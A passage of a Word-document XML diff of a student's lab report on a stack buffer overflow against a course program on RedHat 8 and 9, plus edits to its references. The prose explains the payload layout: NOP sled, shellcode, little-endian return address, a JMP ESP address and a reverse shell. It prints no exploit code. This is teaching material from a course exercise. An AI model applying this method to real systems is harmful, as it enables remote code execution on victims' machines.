-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">The language I used to generate and test my exploit was python for a week which frustrated me and then I switched to C(attached the half developed exploit) for a brief evening before going back to my work in python. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">After figuring out the memory address, where it would be suitable and could fit the entirety of the exploit, you try to reach that address by trying to fill it with characters you can recognize. The input that I sent over after knowing the above information was to create a pattern where I send 827 As, these would represent the NOP sleds, then 205 Fs which would represent the shell code and then 4 Bs, which would be the address to where the redirection of the program would go. Now, in practice those parameters should have worked however, during testing I figured out that it is easier to create a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>pad</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> before the shell program and after the shell program. Now this process </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">took </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>some time</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as when you filled </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>up</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the stack with characters, the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>behaviour</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> wouldn’t change. However, when you replace characters with shell code and NOP sleds, you understand if your code runs or not. Essentially, there should be a better way to figure out how to create a perfect padding</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>. However</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">, I did it using a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>trial-and-error</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> method of wrapping my shell code with a padding of NOP sleds. The formula that essentially worked for me was putting close to enough padding of NOP sleds in the front that it reaches the redirection address, then putting the shell code and then putting padding of NOP sleds till you reach the start of the EIP at which point you put the address in reverse </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>order (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">cause Little Endian). </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">t took me close to a weekend to realize that when you send your exploit, if a program just receives NOP sleds, it will corrupt your input, or at least that is what happened in my case. The structure for my exploit which </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">is </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>overflow_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = NOP + shell code + NOP+Redirection address. However, when sending the exploit to the server, I created another string, called “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>send_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">”, this string contained some non-trivial string, in my case </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>helloworld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Since, we added </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>helloworld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to the start of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>send_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> you have to subtract that many bytes from your padding. Try to remove it from the padding after the shell code so that you do not have to figure out a new starting NOP padding for your exploit. Now, after similar to the way you were testing while understanding the padding needed, you test to see if your exploit works. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Now, since the shell will be returned back to some listening port, you have to listen on that port for that returned shell.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>RedHat9:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Now, since we are technically attacking the same program, however, on a newer version of the operating system that has stack address randomization</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>, most of the things we did are going to be the same as they were for the RedHat8 system. First, similar to the way we figured out that we can control the EIP we check if the EIP is in the same place. Now, since the EIP is still 1032 bytes away, we just have to figure out what address should be put in the EIP. Now, since we learnt about JMP ESP in the earlier part of this report, lets run the program provided to us, or use Mona, to figure out where the JMP ESP. Now, it is important to know that the JMP ESP instruction is located in a place where the progra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">m has shared files. After running, the program we are outputted with all the addresses where we can find the JMP ESP instruction. The instruction, I chose to go with was 0x421276c7. Now, once the EIP is loaded with this address, we go to look if we are jumping to the ESP. Upon comparing, it seems that we do go inside the ESP however, we do not go to the start of the ESP. Now, to tackle this, we have to figure out a way to fill up the stack in such a way that we reach the shell code. This is not a problem as we learned that there is nothing a little padding cannot fix. Now, in this stage I did come up with an issue. Essentially, you could overflow the program so much that the Operating System takes over tells you that program does not take such inputs. So, we figure out how much padding we can put before we essentially run into a similar issue. Through, trial and error, I figured out that after about using 3000 units of NOP sleds your shell code will eventually be reached, and then I added about 30 units of NOP sleds just to be safe. Now, the general pattern that can be followed for similar operating systems, is that first we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">add enough input to control our EIP, this could be filled up with whatever character, then we have 4 bytes of the address where the JMP ESP instruction exists and then we fill up the code with some padding and shell code and then again some more padding. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
+        <w:t xml:space="preserve">References </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Fortinet. (n.d.). Buffer Overflow. Retrieved from</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">Collaborations and References </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:hyperlink r:id="rId5">
+      <w:hyperlink r:id="rId7" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-            <w:b/>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
+            <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
           <w:t>https://www.fortinet.com/resources/cyberglossary/buffer-overflow</w:t>
         </w:r>
@@ -2059,18 +3403,22 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId6">
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Author(s): </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dumitras</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, T. Title: ENEE 657 - Homework 2: Buffer Overflow URL: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:tgtFrame="_new" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-            <w:b/>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
+            <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
           <w:t>http://users.umiacs.umd.edu/~tdumitra/courses/ENEE657/Fall17/homeworks/enee657_buffer_overflow.pdf</w:t>
         </w:r>
@@ -2080,18 +3428,14 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId7">
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Author(s): Wenliang Du Title: SEED Labs: A Hands-On Lab on Buffer Overflow Attacks URL: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:tgtFrame="_new" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-            <w:b/>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
+            <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
           <w:t>https://web.ecs.syr.edu/~wedu/seed/Book/book_sample_buffer.pdf</w:t>
         </w:r>
@@ -2101,18 +3445,23 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId8">
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Author(s): </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Gentrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Title: Metasploit modules not loading URL: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:tgtFrame="_new" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-            <w:b/>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
+            <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
           <w:t>https://forums.kali.org/archive/index.php/t-28940.html</w:t>
         </w:r>
@@ -2122,18 +3471,22 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId9">
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Author(s): </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RoraZ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Title: Why JMP ESP instead of directly jumping into the stack URL: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:tgtFrame="_new" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-            <w:b/>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
+            <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
           <w:t>https://security.stackexchange.com/questions/157478/why-jmp-esp-instead-of-directly-jumping-into-the-stack</w:t>
         </w:r>
@@ -2143,17 +3496,94 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ina – Helped me understand that the NOP sleds are being corrupted and suggested that I add some string before the exploit string. </w:t>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Lyne, J. (2015, March 25). How They Hack: Buffer Overflow &amp; GDB Analysis [Video file]. Retrieved from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:tgtFrame="_new" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=V9lMxx3iFWU</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Collaborations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ina </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Fendel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SSH Issues, Need and benefit from filler code, Problems with byte literals in python3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2713,6 +4143,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="00003947"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -2885,6 +4316,29 @@
       <w:color w:val="666666"/>
       <w:sz w:val="30"/>
       <w:szCs w:val="30"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C85890"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C85890"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
 </w:styles>

</xml_diff>